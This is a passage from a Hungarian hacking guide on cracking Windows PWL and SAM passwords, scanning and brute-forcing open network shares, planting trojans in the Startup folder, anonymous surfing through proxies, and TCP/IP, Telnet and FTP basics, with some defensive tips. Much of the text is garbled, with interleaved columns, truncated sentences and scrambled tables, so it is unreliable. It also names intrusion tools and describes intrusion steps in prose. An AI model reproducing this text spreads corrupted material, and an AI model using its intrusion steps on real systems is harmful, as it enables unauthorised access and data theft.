telefonos kapcsolat jelszavai és a Windows bejelentkező nevek. így tárolódnak például a meghajtók és a nyomtatók hozzáférési jelszavai. Münsterben már 3600 nyomozási eljárás lezárult. 30 feltételezett tettesből álló kör több ezer számítógép-felhasználó jelszavát törte fel .számol be a Der Spiegel hírmagazin nemrégiben megjelent tudósítása. (dpa) Forrás: www. . Praktikus segítség a felhasználóknak és a betörőknek . A PWL a PassWord Library rövidítése. Minden felhasználói profil tartalmaz egy saját PWL fájt. A kódolt jelszó az első pillantásra még ártalmatlan Németország: Hackerek milliós csalása A nyomozók hackerek nagy szabású csalásainak a nyomára bukkantak. Egy kb. a Microsoft nagyon megkönnyíti a betolakodóknak.pwl lesz.

és ezzel lehetetlenné teszi a kiolvasásukat is. Ezt a fájlt nem lehet közvetlenül elérni. Ez a Windows jelszó mellett a hálózati jelszót is őrzi. a fogadó pedig ugyanezzel a kóddal fejti meg az üzenetet. Ha Windows 2000 alatt bejelentkezik egy felhasználó. a Windowshoz sok jelszófeltörő van. A felhasználói névből és a jelszóból a Windows 9x egy 32 bit hosszúságii kódot generál. A feladó egy kulccsal kódolja az átvitelre szánt adatokat. továbbá úgynevezett rekordokat is tárol. s egyfajta „jogosultsági igazolványt" kap.3 Jelszavak a Windows 2000 alatt A Windows 2000 alatt egészen más a jelszavak kezelése. illetve kiolvasását. Van egy program is. A következő verziókban már olyan kódolási technikákat használtak. és szükség esetén figyelmezteti a felhasználót. hogy a jelszó hosszabb vagy rövidebb 32 bitnél.2. ráadásul a trójaiakba is gyakran integrálnak olyan programokat. fájloknál azonban sok idő kell a jelszavak kiolvasásához. A PassSecure a Multimedia Network Systemstől meggátolja. valamint a fájl létrejöttének a dátumát. Ez a kulcs megakadályozza a megadott jelszavak tárolását. főleg a Windows 95 felhasználóknak. A nagyobb PWL A számokból és betűkből álló kombinációk a jelszófeltőrőket is megizzasztják . amelyek a tulajdonképpeni jelszavakat tartalmazzák. hogy ott zavartalanul és időkorlát nélkül kikódolhassák. Hátrányként jelenik meg a kódkicserélés problémája és a ráfordításigényes kódnyilvántartás. amelyeket egy másik számítógépre másolhatnak. ami viszonylag egyszerűvé tette a hackereknek ezek megfejtését. A Windows valamennyi jelszót egy SAM (Security Account Manager)adatbázisban tárol. ehhez számtalan eszköz áll a hackerek rendelkezésére a hálón. a Windows 95/98/ME alatt lehetőség van a HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion \Policies\Network \DisabledPwdCaching = 1 Registry-kulcs létrehozására. Ehhez az update-hez a http://support. amelyeket a winnt/ system32/config/sam fájl tárol. Az RC4 egy szimmetrikus kódolási eljárás. A SAM azokat a felhasználói adatokat használja. Jelszófeltörők Mint már említettük. Ilyenkor a hackerek gyakran lemezre menük a PWL fájlokat. hogy a jelszófeltörők elérjék a PWL fájlokat. a kód mindig ilyen hosszú. amely megakadályozza a jelszavak kiolvasását.asp oldalon juthatunk hozzá. Ezzel a kóddal és az RC4 algoritmus egy változatával kódolják az adatokat a PWL fájlokban. amelyek lehetővé teszik a Windows jelszavak kikódolását. amelyeket ugyan továbbra is számos segédprogrammal fel lehetett törni. A szimmetrikus kódolás előnye mindenekelőtt a kódolás nagy sebessége. ez az adatbázis a Registry része. amelynél mindkét kommunikációs partner ugyanazt teszi .A kódolás A Microsoft a Windows 95 első verzióiban nem nagyon strapálta magát a kódolás algoritmusával. illetve feltörését. amelyben rögzítve vannak a hozzáférési jogai.com/support/kb/artícles/Q132/8/07. A Windows 2000 automatikusan ellenőrzi a jelszavak biztonságosságát. mindez azonban már sokkal több időbe telt. microsoft. s automatikusan figyelmeztet az általános jelszóbiztonság elleni vétségekre. Egy PWL fájl tartalmaz egy header-t. és az. a jelszavak rendszeres változtatását és a karakterek sokszínűségét. mint a Windows 95/98/ME alatt. Sajnos ezt a kódot a megfelelő eszközzel másodpercek alatt fel lehet törni. Mindegy. mivel a Windows állandóan használja. és hogy melyik felhasználói csoporthoz tartozik. Továbbra is ajánlatos azonban. A Windows 2000 ellenőrzi minden jelszó hosszát. 2. amelyek lehetővé teszik a célszámítógép valamennyi jelszavának azonnali kiolvasását. Védelmi lehetőségek Hogy a jelszófeltörő programoktól megvédhessük magunkat.csak ellenkező irányban. hogy az eljárást könnyű implementálni. Ezeknek az adatoknak az alapján a Windows 2000 ki tudja számítani a jelszavak biztonsági kockázatát. a frissítés egy erősebb kódoló algoritmusra. az adatai a Security Account Manager-hez továbbítódnak.

főleg attól függ. Ez a program úgy kerüli ki a hozzáférési védelmet. így például a rendszer különböző réseinek a szkennelését. (A jelszófeltörés témáját a 7. valóban nehéz. Az adathordo- E szolgáltatások felhasználói általában nincsenek tisztában azzal. Ebből a fejezetből kiderül. hogyan lehet felderíteni az ilyen megosztott erőforrásokat.5. például a rendszer hálózatra csatlakoztatása miatt.tolvajkulcs a Windows 2000 jelszavakhoz A LOphtCrack kétféleképpen tud jelszavakat feltörni. egyedüli PC-ként és trójai nélkül. amelyek az NT és a Windows 2000 alatt is lehetővé teszik jelszavak hackelését. A második a brute force cracking. hogy milyen megosztásokat használ a felhasználó. Az egyik legismertebb közülük a legendás LOphtCrack 2. szabvány konfigurációban.5 .internetvagy hálózati felhasználók. Mióta egyre több felhasználó épít ki otthon is kis hálózatocskát. 2. méghozzá minden jelszóvédelem nélkül. amelyet a hackerek okoznak.Időközben azonban számos Brute Force program is íródott. hogy lehetővé tegyék a felhasználóknak a mappák vagy az adathordozók elérését a hálózaton. hogy a háttérben egyfajta másolatot készít a SAM-fájlról. elég idejük van a hackereknek arra. A könyvhöz végzett kutatások során valóban találtunk olyan rendszereket. ahol minden lehetséges szám és/vagy szókombinációt kipróbál. fejezet részletesen újratárgyalja. Azonban a strandard konfigurációt gyakran meg kell változtatni. Az első módszer a dictionary cracking. vagy hogy időnként csatlakoztatni tudjon egy notebookot. . Ráadásul az ISDN. amelyet nem veszünk észre 2. Az ilyen esetek természetesen durva gondatlanságról tanúskodnak. hogy mennyire könnyelműen mozognak egyesek a hálón. amelyeknek a felhasználói minden meghajtót megosztottak. ugyanakkor újra bebizonyítják. hogy milyen veszélyeknek teszik ki az adataikat az internethez kapcsolódással. az xDSL és a flatrate-ek korában.3 A távoli elérésű támadás . LOphtCrack 2. vigyázat! Egyet világosan kell látni: egy távolból jövő támadás egy Windows 95/98/ME rendszer ellen. A kár. hogy kitalálja a jelszót. hogy továbbra is használni tudja a régi PC-jét. hogy a cél érdekében számtalan támadási módot kipróbáljanak. amelynél gyakran használt jelszavak és karakterek listáját használja. zók minden védelem nélküli megosztása vagy a slamposan megadott jelszavak gyakran szélesre tárják a kaput a betolakodók előtt.és nyomtatómegosztást tulajdonképpen arra használják.és nyomtatómegosztás veszélyes biztonsági rések A fájl. amikor a felhasználók rendszerei gyakran folyamatosan kapcsolódnak az internethez.3. a megosztás a magánemberek számára is a biztonságot meghatározó témává vált.1 A fájl.) Itt egy kockázati tényező rejtőzik.

hackerzbook. majd grafikusan megjeleníti ezeket. .hackerzbook. ami azt jelenti. például \\217. hogy a jelszófeltöréshez egy másik eszközt. és nem mindig találja meg azonnal a megosztott erőforrásokat. A megosztások felkutatásához elegendő a számítógép IP-területe Csak a számítógépről szállít információkat. és hogyan működnek? A megosztások felkutatása szkennerprogramokkal történik.59. a Rhino9 szerzeménye.3.3. A következő ábra a megosztott C: merevlemez tartalmát mutatja egy. a hálózaton keresztül elért számítógépen.hackerzbook.de www.161. Kapcsolódás egy másik számítógéphez. a Légion nagyon megbízhatatlan.de www.2. UNIX/Linux Windows 9x/NT.2 Mik azok a szkennerek. Sajnos. Név Auto NetBIOS Hacker Légion NAT SharesFinder URL www. A Légion minden megosztást szkennel a számítógépen. Nem nehéz felismerni a lehetséges kockázatokat és károkat. Az előnyei a Légionnal szemben a nagy megbízhatóság és a nagyon gyors szkennelés.de www. UNIX/Linux Windows 9x/NT/2000 Programok a megosztások felkutatásához Hozzáférés a szabad erőforrásokhoz A talált megosztott erőforrások elérése a következők szerint történik: a támadó egyszerűen beírja a talált IP-címet a Windows Intézőbe.hackerzbook. fájlmegosztással Egy másik a Lan Guard Network Scanner. ami több szkennelést tesz szükségessé. például a Légiont kell használni. A szkennelés eredménye A DOS alatt a NET USE paranccsal is lehet kapcsolatot teremteni. Az egyik legismertebb ilyen a Légion. és semmilyen támadóeszköze nincs.de Operációs rendszer Windows 9x/NT/2000 Windows 9x/NT/2000.

Egy példa arra. Ilyen lehet például egy program. törölni. amit némi tudással vagy megfelelő programmal könnyen ki lehet kerülni. barátnő..5 Brute Porce-rohamok a megosztási jelszavak ellen A legjobb és legismertebb ilyen programok egyike a PQwak. boss. pl.3 Milyen lehetőségeik vannak a betolakodóknak? A megosztott mappát vagy meghajtófájlokat a megosztás módja szerint lehet elérni. a fájl törlődjön. a szisztematikus találgatás. amely Brute Force-rohamot intéz a NetBIOS jelszó ellen. és a szerver elinduljon. vagy a kedve szerint törölhet.4 Jelszóval védett megosztások A megosztott erőforrásokat természetesen jelszóval lehet védeni. Ezzel elérhető. és ezeket jelszóként végigpróbálgatja. De vannak gyakran használt szabvány jelszavak is. Ezt a beavatkozást esetleg észreveszik. . Shane Hird műhelyéből Ez az eszköz többek között a Windows 95/98 alatti fájlmegosztás egy implementációs hibáját használja ki.3.Így lehet DOS alól elérni a másik számítógépet 2. az bizony kérdéses.. vezetékneveket. hogy a felhasználót személyesen is ismeri. ami a helyi hálózaton. kutya nevét. ahogy neki tetszik. hogy milyen hozzáférési módokat adtak meg. hogy a felhasználók kényelemszeretetből gyakran könnyen megjegyezhető jelszavakat adnak meg. Kezdhetné azzal. vagy manipulálni a behatolók Persze ez a védelem a szimpla jelszavak esetén meglehetősen sovány.3. keresztneveket. és több sikerrel kecsegtető módszerek után néz. jelszó.3. amit valamikor a potenciális hacker is fel fog adni. hogy a trójai szerver része (közelebbit lásd a trójaiakról szóló fejezetben) a következő bootolás után telepítődjön. administrator. Egy különösen kedvelt támadási mód egy trójai vírust elhelyezni a C:\WINDOWS\STARTMENÜ\PROGRAMOK\INDÍTÓPULT könyvtárban. mint például gast. hogy csak néhányat említsünk a számtalan. hogy senki se férjen hozzájuk jogosulatlanul a hálózatról vagy az internetről. születési adatokat. Az első. feltölthet. admin. rendkívül hatékony is lehet. Annak megfelelően. A legegyszerűbb védelem: jelszavak az erőforrásokhoz 2. ahol megvan a lehetősége. hogy mi mindent tudnak megváltoztatni. Nehéz jelszavaknál ez természetesen meglehetősen értelmetlen vállalkozás. hónapnevek vagy teszt. ha kap egy hibajelzést. Az is köztudott. 2. de hogy a felhasználó egy trójai becsempészésére fog-e gyanakodni. hogy végiggondolja a felhasználó minden ismert személyes adatát. a betolakodó másolhat. gyakran hebehurgyán felhasznált jelszó közül. amit egy hacker programok segítsége nélkül is megtenne. Ezzel megvalósíthatjuk.

Tulajdonképpen csak erős jelszavak jöhetnek számításba. hogy a bonyolult támadásokkal ellentétben. A PQwaknak egyszerűen meg kell adni annak a számítógépnek az IP-jét. eljárásokat indítsanak vagy fejezzenek be. fejezet). Szerverkörnyezetekben a rendszeradminisztrátor beállíthatja a jelszavak erősségét és futási idejét. hogy teljesen az uralmuk alá hajtsanak rendszereket. amelyek az operációs rendszer felépítésében gyökereznek. illetve a Remote Controll programok.betörés a hátsó ajtón keresztül Nagyon elterjedtek a támadások a hátsó ajtók. sok különleges karakter hiányzik. Egyre jobban elterjednek a trójai-. és amelyekre most csak röviden szeretnénk kitérni. Az ilyen programok felhasználói ritkán gondolkodnak el cselekedetük következményeiről.4 További támadási technikák A bemutatott biztonsági réseken kívül. amit tehetünk. hogy jelszavakat kémleljenek ki. illetve víruskere- . amelynek a jelszavait fel kell törnie.Előkészület a célzott támadásra Ez a megoldás azonban sok felhasználó számára szóba sem jöhet. természetesen vannak még más támadási lehetőségek is. A trójaiak a felépítésüknél fogva kitűnően alkalmasak arra. illetve töröljenek. Ez ugyan nem kínál százszázalékos védelmet.megszüntetjük a megosztásokat Trójaiak . Aránylag kényelmetlen. 2. így azután a legrövidebb idő alatt szinte minden jelszót fel lehet vele törni. Itt újból bizonyítást nyer az alfanumerikus kombinációk erőssége.és nyomtatómegosztás megszüntetése a hálózati környezet beállításainál. de jelentősen megnehezíti a betörést. Ezeknek a programoknak a problematikája az egyszerűségükben rejlik. amelyek megakadályozzák a trójai szerver kapcsolódását a klienshez. annak gyakran kell újraindítania. amelyeket most csak bemutatunk. manipulálják a Registry-t.0-s verziója nincs túl gondosan programozva. amelyek külön fejezetet kaptak a könyvben (lásd 4. amelyek védik az erőforrásokat. ami azt jelenti. és aki sikert akar elérni. és megosztásokat hozzanak létre. mivel rá vannak utalva a megosztott erőforrások használatára. ismertebb nevükön a trójaiak segítségével. Mind gyakrabban használnak tűzfalakat.3. és kiindulhatunk abból. Ez különösen a „szabadidős hackereknek" nyújt lehetőséget arra. itt semmiféle háttértudás megszerzésével nem kell foglalkozni. ha védekezni akarunk az ilyen támadások ellen: a fájl.6 Óvintézkedések A legegyszerűbb. és egyre gyakrabban figyelnek oda arra. A PQwak minden karaktert és különleges karaktert felismer. és ennek megfelelő agresszivitással támadnak áldozataik rendszereire. 2. hogy egy bizonyos idő múlva a még oly türelmes hacker is feladja. Továbbá minden szükségtelen protokollt. de veszélytelen . hogy ne nyissák meg gondatlanul a mail-ékhez csatolt fájlokat. adatokat másoljanak. A felhasználók magatartása különösen a médiák felvilágosító tevékenysége nyomán az utóbbi években erősen megváltozott. A PQwak l . köztük a NetBIOS-t is távolítsuk el.

De még mindig elég sok felhasználó van. amelyek vállalati hálózatokban működtek. és fütyülve minden figyelmeztetésre.ső programok is. illetve megfelelő figyelmeztetésekkel megakadályozni a telepítésüket. . ismeretlen és komolytalan forrásból származó fájlokat nyitnak meg. amelyek képesek észlelni és eltávolítani a szerveralkalmazásokat a rendszerben. A gyakorlatból ismerünk olyan eseteket. mikor már régóta ismert trójaiak. mint a Sub7 vagy a BackOrifice (pontosabbat ezekről a programokról a trójaiakról szóló fejezetben) települtek olyan számítógépekre. Ez a magatartás durván felelőtlen. de a rendszergazdák valószínűleg csak a káresetekből fognak tanulni. A védekezés és a felismerés lehetőségeivel ugyancsak a trójaiakról szóló fejezetben foglalkozunk. akikben nem tudatosultak ezek a veszélyek.

.....3 Néhány alkalmazás és protokoll használata és a biztonságosságuk . fejezet ..1.....2 Az FTP 3.. A TCP/IP 3..1 Mi a TCP/IP? 3..3...3............ Az IRC 3.....2. 3.2 .1 A Telnet 3. Névtelenül 3...Tartalom 3...4 A portokról ....3............1 A legtöbb felhasználó sokat elárul3...1 Az anonim internetezés csökkenti a kockázatot .. 3...3.1.2...............3.3.4 Az IP-címzés 3.2 Különböző protokollok a rétegekben 3...2..

hogy kiderítse a lakásunk. Ezzel akkor kell foglalkozdünk a háló kémlelésének.kockázattá.ok don szörfözünk a neten. anonim internetezés csökkenti a ckázatot et az anonim szörfözésnek szenteltük. Ha egy o tartalmaz ilyen „bogárkát". amikor a web-bugot megnézték. az időpontot. és a nézőnek egyáltalán nem tűnik fel. A parányi GIF-képecske (egy pixel méretű).tudnia kell a pontos címet. Az IP-cim minden alkalommal átmegy az adatokkal együtt. igen jó rálátás kíetkörülményeinkre és a szokásainkra. GIF-ekről. amelyet minden számítógép az internetre lépéskor k Az interneten megtett utat. a b valamint egy korábban elhelyezett cookie információit. és esetleg károkat nekünk. Csak ezután á.mert egy hacker nem jeC-nk szempontjából . E mmi sem történhet. mivel egészen k átadja egy szervernek az IP-címet. személyes adatokat adunk meg. hogy megakadályozzuk saját IP-címünk átadását jobb megértés kedvéért képzeljük el egyszer az IP-címet a követggésben: egy potencionális betörőnek .1. akkor ID-vel együtt lehet tárolni. ICQ vendégkönyvekben és a nyílt fórumokon. A kis web-bugokról van szó. Ez den bemutatja a legfontosabb információkat. de amint ez ismertté válik. amit az anonim szörfözésnél el kell titk tuális IP-cím. arról természetesen szintén itt olvas 3. Aki csak általában akar a hackerek tevékenységéről tájékozt a fejezetet természetesen nem kell elolvasnia. a ek URL-jét.a PC-nk nyitott portjához hasonlóan . Csak ennek az adatnak az ismeretében válik a aablak . a m IRC.1 A legtöbb felhasználó sokat elárul e többet megtudni a hackerek tevékenységéről. egy emelettel és lakásszámmal együtt tacímhez hasonlít. Így viszont sok emenően érthetetlen marad.hiszen a névjegym osztogatjuk mindenütt. annak az internet alapjaival is közelebbi ismeretségbe Különben bizonyos támadási lehetőségek aligha követhetőek. amelyben öntudatlanul is feladjuk az anonimit valószínűleg a legkevésbé tűnt fel. . nagyon pontos címzés. és kikapcsolni sem lehet Tehát a legfontosabb. és ez gük lesz pontosan kideríteni az identitásunkat. Mindkettő hasonlít a talán már ismert cookie-khoz. amint az a lenti példából is lá könnyen követni lehet az IP-címek segítségével. a felkeresett oldal URL-jét. Mindenhol h nyomokat. illetve a házunk gyenge pontjait. A „normál" és az anonim szörfözés közötti kü http://privacy. amely valahol a webo tegrálva. amelyek alapján hackerek figyelhetnek fel ránk. ha „normál" mó- Egy szituáció. Hogy ezeknek a részleteknek a nyilvános hogyan akadályozhatjuk meg. Így némi erhető a technikákba is. Ennek a fejezetnek az első része azt is milyen információkat kaphatnak rólunk mások. szörfözés célja. suk a legfontosabbakat a névtelen szörfözésről . amelyek lehetővé tesznek bizonyos tákat. min csak ebből semmit nem lehet észrevenni. stratégiáiról és őségeiről. amelyek a „hacker és egyben a védekezés alapismeretei közé is tartoznak.net/anonymizer oldal teszi világossá. és gyakorlatilag úgy működik.

mint a JavaScript és hasonlók). Íme. Így például le tudja nyomni a weboldalakon található .com/lists/proxy/ címen találunk listát. és a hostnak a proxy IP-t. 3. 2. hogy titkosítsuk a saját IP-címünket. Ebből a rövidítésből g az is kiderül. hardverként vagy szoftverként. fent nevezett információt. ahogy az előbb már említettük. Az ilyen oldalak működési módja: az proxy-szerver többé-kevésbé szűri. mint minden más. Ha ezt az oldalt most egy anonymizeren keresztül keressük fel. Mostanában a Junkb jött divatba (közelebbi információk a www. másik IP-t oszt ki . Ehhez egy kis m proxyk. hogy csak (!) a proxy-szerverrel van ben. a ho „hiszi" (az IP alapján). azt mindjárt kiderül.cgi. mert egyéni igények szer ható. Azon tőség is van arra. például Mozilla/4. itt például Linux 2. (ezek egy táblát akasztanak ránk. l URL-je. Az IP-cím és az útvonal mellett előfordulhat.de vagy a klassziku anonymizer. az Anon használata. egy mási milyet se mutassunk. gésző az e-mail-címeket és/vagy a login neveket is továbbítja. Egy másik egyszerű módszer egy anonim proxy-szerveren figurálni a saját böngészőnk kapcsolatát. A kliens tehát össze van kötve a hosttal.Információk az Anonymizernél Úgy az IP. tehát a szolg újabb betárcsázáskor egy új.2. vagy legalábbis néhány közülük hatóvá válik idegenek számára: Talán már a fentiekből is világossá válhat. csak a szerver címét és a por gésző Internet-beállításainál (legjobb. csak annak a weboldalak az információi kerülnek ki.junkbister.2 Névtelenül A cél tehát az. Hogy mo konfiguráljuk a böngészőnket.com. Magunk is beszerezhetünk egy proxy-programot vagy egy ul a http://proxys4all. Tehát a proxy képviseli a számítógépünket.co kezdőknek kicsit nehezebb ennek a szoftvernek a telepíté szont kedvezőbbek a lehetőségek. ha minden protokoll Az aktuális proxy-szerverekről és csatlakozásaikról a cyberarmy. és nem a din IP-t mutatják.7 [en] (X11. hogy a következő adatok mindegyike.12 i686) a Netscape-hez (angol verzió). a kliens és a hos vannak kapcsolva. amelyről az oldal linkjére kattintottunk (HTTP- s A legegyszerűbb. Vanna keresőgépek is és hasonlók. vagy talmakon keresztül. hogy mégiscsak m valamennyire az anonimitást az internetes szörfözéskor.net címről.2. hogy: „Megint itt vagyok!") az interneten. hogy védekezzünk. Hogy hetséges. mint a teljes útvonal is felismerhető.1. ben a böngésző ismeri ezeket (az e-mail-címet a böngésző jelszó tadhatja egy anonim FTP-szerverhez való hozzáféréshez. hogy milyen operációs rendszer melyik verzióját uk. amelyet a számítógép egy oldalhoz választott.12-t egy Intel PC-n. amelyről erre az oldalra mentünk. és az ott tartózkodás ideje. idítés a használt webböngészőhöz. például a http://anonsurf. és lehetőség szerint minden egyéb adatunka Egy előzetes megjegyzés: a saját IP-címünk egy internet-sz resztül történő szörfözéskor rendszerint dinamikus. néhány ezek közül: ez tartozó domain név.de természetesen újból olvasni.

A Mix hátránya. hogy mi kerüljön a cache-be. és így sem lehet. Mindez a ra védelmét szolgálja. Hogy meghat mációkhoz juthassunk. és ezek után minden jogosultságot tesztel Sok szolgáltató kínál ingyenes shell-account-okat (ezek azonb . és nem kell ezt a véletlenre vagy a webböngé tett alapértelmezésre bízni. A cachen különböző kritériumok szerint közlekedhetünk. amelyeket a következő online kapcso- • Egy további kis anonimitási rés csak az Internet Explorer felhasz nyes: ezek az Active Channelek. hogy a csatorna előfizetője már nem anoni tokat egy szerverről. A kommunikáció a Mixen belül kódolt. Termés konfigurálható. Ez a technológia először Internet Explorer 4. Az oldalakat. ilyenkor po adhatjuk. latnál fog betölteni és hasonlókat. hogy milyen fajta webdoku milyen HTML-kódba integrált scriptek megengedettek. A Webwasher. akkor beszerez mag shell-accountot. Még ha valóban anonim proxykat is használunk. hogy hálózati kapcsolat ssen navigálni ebben a cache-ben. Ha csak egyeden gbízhatóan működik. A mi szempontunkból azonban inkább onságai érdekesek: a Webwasherrel megakadályozható a erer küldése. amely az anonimitásról gondoskodhat. Tehát: ha nincs rá feltétlenül szükségünk.vagy a JavaScriptWWWoffle-t FTP-proxyként is lehet használni. feljegyzi egy listára. kilistáztatául az összes. amelyekre rá de még nincsenek a cache-ben. hogy milyen felhasználói névvel jelentkezzen be FTP-szerverre. azonban más háló sokra is átvihető. az animált képeket és a pop-up menüket. azé az URL-é. Minden Mix gyűjti a bejövő üzeneteket. majd az emre váltáskor kérésre automatikusan betölti. E letilthatjuk a frame-ek vagy a képek letöltését. Sajnos a JavaScript funkciókat minden böngészőnél lehet célzottan inaktiválni. inkább kapcso • Ha egy hacker valami nagyobbat tervez. Az Active Channelekkel ki egyet egy webszerver-üzemeltető ajánlatából (kezdőlap). amelyet minden esetben ki kell y át kell engedni. csak egyes teket lehet találni. • A proxy-knál még egy fontos szempontra kell ügyelni.webwasher. a böngészőben általában külső URLtintani vagy be kell gépelni ezeket. ezt azonban lekapcsol Webwasher magáncélra ingyenes. állomásból áll. A koncepciót um eredetileg e-mail küldéshez fejlesztette. s ezekről üzeneteket küldenek. vagy a legutóbbi kapcsolódás során meglátoga esetleg minden oldalt.i eszköz a jelenleg csak kevesek számára elérhető Mix-System. hogy kiszűrje a weboldalakról a nereket. A programot szőből lehet kezelni. egy w ködtetője egy JavaScripten keresztül továbbra is le tudja kér címeket. Így nem lehet összefüg teni a bejövő és a kimenő üzenetek között. user agentként. amelyről az oldalra kattintottak. hanem minden elérésnél újból felismerhet érdeklődési köre a kiválasztott channel(ek) alapján meghat Active Channel technológia a már említett cookie-k szemé használja. szét és egy bizonyos idő után továbbküldi. Létezik ugyan egy verziója Windows 95-höz is. amel vagy az internetre kapcsolódás indításakor betöltődik (tehát b vagy állandó kapcsolat esetén a számítógép indításakor). ezért ennek a leírásáról itt lemon akiknek egy kicsit több idejük van és Linux-pártiak. és megtalálható a w. Alapértelmezésként ez st kap. vagy kiköthe volítsa el a HTML-kódból a Java. a valóban a sző által elküldött sztringeket küldi el. itt is célzottan lehet definiá headert. és lehetővé teszi. Az eg tő veszély itt is az. a program lehet érdekes. Pontosan megadhatjuk. amiről sen megfeledkeznek.de címen. megadhatunk egy URL-listát. er Windows 95/98/NT/2000-hez és a Macintosh-hoz is meg ősorban arra szolgál. A WWWoffle Unix/Linux rendszerek s NT alatt fut. hogy a Webwashert használja. A cache-tartalmon belüli k egészítésképpen saját keresőgépet is lehet telepíteni. a Webwasher. vagyis a anonim marad. ő eszköz. A mi szempontunkból a WWWoffle főleg azért lehet a Junkbusterhez hasonlóan.0-s verzióban jelent meg. hogy nagy hálózati terheltséget Mixek még nem állnak nyilvánosan rendelkezésre. az egész rendszer megbízható. beleértve az online és az offline módok tást is. Ez a proxy elsősorban cache-elő verként működik. n nem működik hibátlanul. mert megakadályozza az olvasó „zavará mtalan reklámbannerrel. A JavaScript utólag mégis áthúzhatja a kat.

, vagy vannak hackeroldalak, amelyeken frissen feltört accountin-ek vannak, amelyeket használni lehet.

ackerek többnyire olyan rendszereket használnak platformként dszerek megtámadásához, amelyeket már a hatalmukban tartanak, mális (legális) szörfözéshez az említett lehetőségek is teljesen ele-

Hogyan működnek a protokollok? A két protokoll, a protokollok egymásra rétegződésén, „hal stack) keresztül működik. A protocol stack az az út, amelyet az a kell tenniük ahhoz, hogy az egyik számítógépből a másikba jussa amelynek a rétegei közül a TCP/IP csak kettőt, nevezetesen a 3 használja, a következőképppen van felosztva:
Réteg Alkalmazási réteg Megjelenítő réteg Leírás

n valaki, a fenti tanácsokat megfogadva, elrejtette az IP-címét, rogram csak a proxy-szerverről gyűjthet „személyre szabott" inmivel nekünk, felhasználóknak, nem sokat árthat.

Az alkalmazási réteg képezi a csatolófelületet az alk A megjelenítő rétegben a másik számítógép rendsz

között, amelyekkel a felhasználó parancsokat küld illetve fogad egy hálózato felhasználás-specifikus formattálások történnek. Session réteg

Ez

CP/IP

gondoskodik arról, hogy az alkalmazások között megszakadt kapcsolatok helyen is folytatódjanak. Transzport réteg Ez a réteg gondoskodik a

felálljanak és - az adatvesztés megakadályozása miatt - részben ugyan

akaszban néhány protokollt szeretnénk megismertetni, amelyeket álnak. A legfontosabbak közé tartozik a Transmission Control és az Internet Protocol (IP). vetkező részben a protokolloknak azok a funkciói szerepelnek, lözhetetlenek a későbbi célokhoz, így ennek a könyvnek a hasztt közölt tudás tökéletesen elegendő. Sajnos a téma olyan kompes kifejtése messze meghaladná e könyvnek a kereteit.

adatátvitelről a két számítógép között, és gyakran csatolófelületként is szolgá alkalmazási rétegek és az alá rendelt hálózati rétegek között. Hálózati/

Ebben a rétegben folyik az optimális út (routing) keresése az kapcsolati ré (pl.: IP). Adatbiztonsági réteg réteg

adatátvitelhez. A protokollt itt már a fölé rendelt rétegektől függetlenül ki leh

Ez a réteg arról gondoskodik, hogy lehetőle

hibás átvitelek, és ha mégis lennének, akkor az adatok helyre legyenek állít illetve küldésekor.

Ez a réteg felelős a fizikai kapcsolat létrehozásáért az adato

a TCP/IP?

két hálózati protokoll neve, amelyeket az interneten és a modern használnak: az IP azonban csak két protokoll-fajta a TCP/IP protokoll-csa-

sion Control Protocol (TCP) és Internet Protocol (IP).
A TCP IP-protokollhalom rétegei az OSI-modell szerint

rotokoll-család a háló minden szolgáltatását elvégzi, ide tartozik ldése, az adatok átvitele, hozzáférés a World Wide Webhez és az tása a usenet-en keresztül.

Az adatok a számítógépből kifelé tartva az ábrázolt sorrendb resztül ezeken a rétegeken, és fordított sorrendben mennek bef szerbe. Minden réteg tud adatokat küldeni a szomszédos rét adatokat fogadni attól. Valamennyi réteg protokollokkal van öss lyek különböző szolgáltatásokat nyújtanak.

önböző protokollok a rétegekben

Parancs Chown

Leírás Egy egyszerű szövegszerkesztő.

lán valamivel érthetőbb, hogyan történik a protokollhalmon keok küldése, illetve fogadása. Most megnézzük egy kicsit közeböző rétegek legfontosabb protokolljait.

Megváltoztatja a tulajdonost és a csoportot, amelyhez eg

és/vagy egy fájl tartozik. joe

A legfontosabb Telnet-parancsok

si réteg FTP

g, amelyben a felhasználó közvetlenül egy alkalmazásba írhatja t, hogy kapcsolatot nyisson egy számítógéppel, vagy megfelelő jon ki. Fordított értelemben tehát az alkalmazási réteg az a réteg gy alkalmazás az A számítógépen a B számítógéptől is megkapait. Ebben a rétegben egész sereg protokoll van, és ezeket felülárolja semmi. Bizonyos alkalmazások itt más alkalmazásokra is en például a HP egy SNMP-re épülő programja, az OpenView. nézzük ennek a rétegnek az alkalmazásait!

A Fik Transfer Protocol egy szolgáltatás, amely minden operá belül lehetővé teszi az adatok átvitelét és azoknak a mindenkori ban mentését. Mint tudjuk, a legtöbb operációs rendszer különb tumokat használ. A Unix és a Unix-klónok gyakran NFS-t System) használnak, az OS/2 általában HPFS-t (High Performance DOS/Windows pedig kizárólag FAT-et (File Allocation Table) v Windows 2000 és az XP ezenkívül még az NTFS-t is segítség FTP-n keresztüli kommunikáció, akárcsak a Telnet, a kliens-sz épül, de valamivel komplexebb. Ebbe nem akarunk részletesebb azonban a következő pontokat megemlítjük: A kommunikáció öt fázisra osztható:
Fázis 1. fázis: Leírás

k elején még nem voltak igazi hálózatok. Voltak viszont nagygée terminálokat csatlakoztattak. Egy terminál akkoriban csak káztül tudott adatot cserélni a nagygéppel, a további terminálokkal án nem kommunikálhatott. Hogy egy újabb kábelrengeteg létesí, szoftveres megoldásra volt szükség. Így jött létre a Telnet, amely a felhasználóknak, hogy úgy tudjanak adatokat szerkeszteni stb., ülnének a másik gép shell-je (DOS promptja) előtt. A felhasznázvetlenül az alkalmazásnak kiadott paranccsal nyitott meg egy legfontosabb Telnet-parancsokat az alábbi táblázat tartalmazza.
Az aktuálisan

A kliens kérdést küld a számítógépnek, hogy a szolgáltatás

Kapcsolatfelépítés zésre áll-e, az pedig megerősítést küld, hitelesíti a felhas jelszót, és átküldi az átviteli opciókat és a fájlnev(ek)et. 2. fázis: portra vonatkozó információkat, és előkészítik a tulajdon-Adatátviteli kapadatátvitelt. Miután ezt rögzítették, elkezdődhet a tulajdon-csolat létesítése adatátvitel. 3. fázis: formában, aho-Adatátvitel gyan azt már leírtuk. 4. fázis:

Ki

Az adatátvitel az FTP-n keresztül történik, a

Leírás Létrehozza a New nevű Megváltoztatja

